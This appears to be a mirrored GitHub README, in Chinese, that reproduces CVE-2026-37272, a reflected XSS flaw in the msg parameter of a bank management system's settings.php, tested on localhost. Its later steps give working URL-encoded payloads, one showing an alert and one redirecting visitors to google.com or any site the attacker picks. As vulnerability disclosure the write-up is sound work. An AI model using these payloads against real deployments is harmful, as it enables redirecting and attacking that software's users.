vytlanikhil/CVE-2026-37272

GitHub: vytlanikhil/CVE-2026-37272

该项目记录了CVE-2026-37272漏洞的完整复现过程,展示了银行管理系统settings.php页面因msg参数未过滤而导致的反射型XSS漏洞。

Stars: 0 | Forks: 0

# CVE-2026-37272 **CVE-2026-37272** 使用 CVE-2026-37272。 **注意:-**这正是我向 mitre.org 发送邮件的具体格式,他们也据此进行了回复 此外,我仍未将其公开(将在通知所有者后进行) **漏洞分析(Writeup):-** 1.在本地部署仓库 ![image.png](https://static.pigsec.cn/wp-content/uploads/repos/2026/05/fcef7082ec163209.png) 2.使用测试凭据登录 账号:200 密码:a 点击“Login” ![image.png](https://static.pigsec.cn/wp-content/uploads/repos/2026/05/c0eafff1c2163210.png) 3. 导航至 [http://127.0.0.1:8000/pages/dashboard/settings.php](http://127.0.0.1:8000/pages/dashboard/settings.php) ![image.png](https://static.pigsec.cn/wp-content/uploads/repos/2026/05/1ee68b9b12163211.png) 4. 进行基础验证 在 URL 中添加“?msg=test123” 使其变为“settings.php?msg=test123”,然后按回车键 ![image.png](https://static.pigsec.cn/wp-content/uploads/repos/2026/05/d27f9a2291163212.png) 我们可以在这里看到,地址栏下方显示了“test123” 5. 现在使用 XSS payload 进行测试 使用“[http://localhost/bank-management-system-in-web-main/pages/dashboard/settings.php?msg=](http://localhost/bank-management-system-in-web-main/pages/dashboard/settings.php?msg=%3Cscript%3Ealert(%27XSS%27)%3C/script%3E)” ![image.png](https://static.pigsec.cn/wp-content/uploads/repos/2026/05/0f56e2de85163213.png) 成功了! 6. 现在让我们将其重定向到 google.com 使用“[http://localhost/bank-management-system-in-web-main/pages/dashboard/settings.php?msg=](http://localhost/bank-management-system-in-web-main/pages/dashboard/settings.php?msg=%3Cscript%3Ewindow.location.href=%27https://google.com%27%3C/script%3E)” ![image.png](https://static.pigsec.cn/wp-content/uploads/repos/2026/05/1dd4a154ca163215.png) 它将被重定向到 google.com 或你在 XSS payload 中指定的网站
标签:CISA项目, CVE-2026-37272, OpenVAS, PHP, Web安全, Web漏洞, XSS, 反射型XSS, 攻击载荷, 数据可视化, 漏洞复现, 漏洞情报, 网络安全, 蓝队分析, 跨站脚本攻击, 输入验证不当, 银行管理系统, 隐私保护